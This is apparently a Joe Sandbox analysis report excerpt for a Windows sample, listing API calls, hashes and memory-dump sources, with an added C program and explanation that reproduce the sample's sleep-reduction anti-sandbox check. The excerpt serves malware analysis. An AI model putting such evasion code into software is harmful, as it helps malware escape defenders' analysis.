                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32 ref: 0044C509
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3031425849-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
• Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
• Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
APIs
• RegEnumKeyExW.ADVAPI32 ref: 004422F0
• RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
• RegCloseKey.ADVAPI32(00000000), ref: 0044234E
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
• RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
• Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
• Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
• Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
• Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
• Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
• Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
• Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
APIs
• GetClientRect.USER32(?,?), ref: 00447997
• GetCursorPos.USER32(?), ref: 004479A2
• ScreenToClient.USER32(?,?), ref: 004479BE
• WindowFromPoint.USER32(?,?), ref: 004479FF
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
• Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
• Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
• Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
• Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
APIs
• GetWindowRect.USER32(?,?), ref: 00447C1B
• ScreenToClient.USER32(?,?), ref: 00447C39
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
• EndPaint.USER32(?,?), ref: 00447CD1
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 659298297-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1300944170-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(009B1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(009B1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 142311417-0
APIs
• _memset.LIBCMT ref: 0044955A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
• _wcslen.LIBCMT ref: 004495C1
• _wcslen.LIBCMT ref: 004495CE
• SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1843234404-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindowVisible.USER32(?), ref: 00445721
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
• _wcslen.LIBCMT ref: 004457A3
• CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
APIs
• IsWindow.USER32(00000000), ref: 00459DEF
• GetForegroundWindow.USER32 ref: 00459E07
• GetDC.USER32(00000000), ref: 00459E44
• GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
• ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
• WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
• connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
• WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
• closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
APIs
• DeleteObject.GDI32(00000000), ref: 00447151
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
• SelectObject.GDI32(?,00000000), ref: 004471A2
• BeginPath.GDI32(?), ref: 004471B7
• SelectObject.GDI32(?,00000000), ref: 004471DC
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
APIs
• Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
• Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
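The Sleep, QueryPerformanceCounter, Sleep, QueryPerformanceCounter call order listed above for the function around 0043771E is the shape of a sleep-reduction check, which is what the report's "Contains functionality to detect sleep reduction / modifications" signature keys on: the code brackets a delay with high-resolution counter readings and treats a delay that returned too early as evidence that Sleep() has been hooked or accelerated by a sandbox. The report shows only the call order, not the real arguments or the comparison, so the following C program is an added illustration of that check and not decompiled code from AENiBH7X1q.exe. The delay lengths, the 90% threshold and the POSIX fallback (CLOCK_MONOTONIC and nanosleep, so the same decision logic can be compiled and tested off-Windows) are assumptions.

```c
/* sleep_skip_check.c: illustrative sleep-reduction detector (added example).
 * Mirrors the Sleep / QueryPerformanceCounter / Sleep / QueryPerformanceCounter
 * call order seen in the report; NOT decompiled from the sample.            */
#ifndef _WIN32
#define _POSIX_C_SOURCE 199309L   /* clock_gettime, nanosleep, CLOCK_MONOTONIC */
#endif
#include <stdint.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* High-resolution monotonic tick source: QueryPerformanceCounter on Windows,
 * CLOCK_MONOTONIC (nanosecond ticks) elsewhere.                              */
static uint64_t ticks_per_second(void)
{
#ifdef _WIN32
    LARGE_INTEGER f;
    QueryPerformanceFrequency(&f);
    return (uint64_t)f.QuadPart;
#else
    return 1000000000ULL;
#endif
}

static uint64_t ticks_now(void)
{
#ifdef _WIN32
    LARGE_INTEGER c;
    QueryPerformanceCounter(&c);
    return (uint64_t)c.QuadPart;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

static void sleep_ms(uint32_t ms)
{
#ifdef _WIN32
    Sleep(ms);
#else
    struct timespec ts;
    ts.tv_sec = (time_t)(ms / 1000);
    ts.tv_nsec = (long)(ms % 1000) * 1000000L;
    nanosleep(&ts, NULL);
#endif
}

/* Pure decision step, kept separate so it can be exercised with synthetic
 * counter readings. Returns 1 when the counter advanced by less than
 * min_fraction of the requested delay (Sleep() patched to return at once,
 * or time-warped), or when the counter went backwards (tampered clock).      */
int sleep_looks_shortened(uint64_t before, uint64_t after, uint64_t freq,
                          uint32_t requested_ms, double min_fraction)
{
    if (freq == 0 || after < before)
        return 1;
    double elapsed_ms = (double)(after - before) * 1000.0 / (double)freq;
    return elapsed_ms < (double)requested_ms * min_fraction;
}

/* The probe itself: Sleep(0) to yield, read the counter, sleep for the
 * requested delay, read the counter again. The 90% threshold is an
 * assumption; the sample's real threshold is not visible in the report.     */
int probe_sleep(uint32_t requested_ms)
{
    uint64_t freq = ticks_per_second();
    sleep_ms(0);
    uint64_t before = ticks_now();
    sleep_ms(requested_ms);
    uint64_t after = ticks_now();
    return sleep_looks_shortened(before, after, freq, requested_ms, 0.9);
}

int main(void)
{
    int shortened = probe_sleep(50);
    printf("50 ms sleep %s\n",
           shortened ? "returned early: Sleep hooked or accelerated?"
                     : "took its full time");
    return shortened;
}
```

Build with `cl /W4 sleep_skip_check.c` on Windows or `cc -std=c99 sleep_skip_check.c` elsewhere. The check fires when an analysis environment shortens Sleep() without scaling the performance counter by the same factor, so an emulator that wants to stay invisible to this pattern has to patch both sides consistently (or run the delay for real and accept the lost analysis time).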
APIs
• SendMessageW.USER32 ref: 0046FD00
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
• SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
• DestroyIcon.USER32(?), ref: 0046FD58
• DestroyIcon.USER32(?), ref: 0046FD5F
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$DestroyIcon
• String ID:
• API String ID: 3419509030-0
• Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
• Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
• Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
• Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
APIs
• __getptd.LIBCMT ref: 004175AE
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __amsg_exit.LIBCMT ref: 004175CE
• __lock.LIBCMT ref: 004175DE
• InterlockedDecrement.KERNEL32(?), ref: 004175FB
• InterlockedIncrement.KERNEL32(009B2D00), ref: 00417626
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
